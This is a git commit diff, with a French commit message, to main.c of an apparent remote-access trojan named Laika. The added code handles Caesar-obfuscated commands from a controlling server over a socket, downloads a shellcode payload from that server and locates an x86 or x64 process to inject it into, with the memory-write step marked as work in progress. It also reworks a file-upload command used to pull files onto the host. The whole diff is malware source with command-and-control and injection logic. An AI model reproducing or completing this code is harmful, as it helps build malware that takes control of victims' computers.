ajout du début de l'injection de shellcode

à faire: injecter le shellcode, trouver un moyen pour télécharger le shellcode dans le buffer sans passer par un fichier intermédiaire en utilisant la même fonction que pour l'upload
2023-02-21 21:28:16 +01:00
parent 72b4761011
commit ab627f939d
10 changed files with 219 additions and 22 deletions
--- a/Laika/main.c
+++ b/Laika/main.c
@@ -6,6 +6,7 @@
 #include "config.h"
 #include "resolve_apis.h"
 #include "file_explorer.h"
+#include "shellcode.h"

 HANDLE g_hChildStd_IN_Rd = NULL;
 HANDLE g_hChildStd_IN_Wr = NULL;
@@ -285,6 +286,70 @@ retry:
 			Api.free(drives);
 		}

+		if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject
+			char* arch = (char*)Api.malloc(3);
+
+			if (Api.recv(sock, arch, 3, 0) <= 0) {
+				//send failed
+				Api.free(arch);
+				Sleep_(Sleep_TIME);
+				goto retry;
+			}
+			CAESAR_DECRYPT(arch);
+
+			// Create a file handle for the memory buffer
+			HANDLE hFile = Api.CreateFileW(
+				L"ykifyk",
+				GENERIC_READ | GENERIC_WRITE,
+				FILE_SHARE_READ | FILE_SHARE_WRITE,
+				NULL,
+				CREATE_ALWAYS,
+				FILE_ATTRIBUTE_NORMAL,
+				NULL);
+
+			upload_file(sock, hFile);
+
+			// Open the file handle for reading
+			hFile = Api.CreateFileW(
+				L"ykifyk",
+				GENERIC_READ,
+				FILE_SHARE_READ | FILE_SHARE_WRITE,
+				NULL,
+				OPEN_EXISTING,
+				FILE_ATTRIBUTE_NORMAL,
+				NULL);
+
+			if (hFile == INVALID_HANDLE_VALUE) {
+				Sleep_(Sleep_TIME);
+				goto retry;
+			}
+
+			char* buffer = (char*)Api.malloc(BUFFER_SIZE);
+			Api.ReadFile(hFile, buffer, BUFFER_SIZE, NULL, NULL);
+			Api.CloseHandle(hFile);
+
+			HANDLE proc;
+			if (Api.strncmp(arch, "x86", strlen("x86")) == 0) {
+				proc = FindProcessByArch(L"x86");
+			}
+			else {
+				proc = FindProcessByArch(L"x64");
+			}
+
+			if (proc == NULL) {
+				Api.free(arch);
+				Api.free(buffer);
+				Sleep_(Sleep_TIME);
+				goto retry;
+			}
+
+			//Api.WriteProcessMemory(proc, (LPVOID)0, "", 0, NULL); WIP
+
+			Api.CloseHandle(proc);
+			Api.free(arch);
+			Api.free(buffer);
+		}
+
 		if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list
 			char* file_list = (char*)Api.malloc(BUFFER_SIZE);
 			char* path = (char*)Api.malloc(MAX_PATH);
@@ -360,8 +425,20 @@ retry:
 				goto retry;
 			}

-			upload_file(sock, CAESAR_DECRYPT(path));
+			LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path));

+			HANDLE file_handle = Api.CreateFileW(wstr, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+			if (file_handle == INVALID_HANDLE_VALUE) {
+				Api.free(path);
+				Api.free((LPWSTR)wstr);
+				return;
+			}
+
+			Api.free((LPWSTR)wstr);
+
+			upload_file(sock, file_handle);
+
+			Api.CloseHandle(file_handle);
 			Api.free(path);
 		}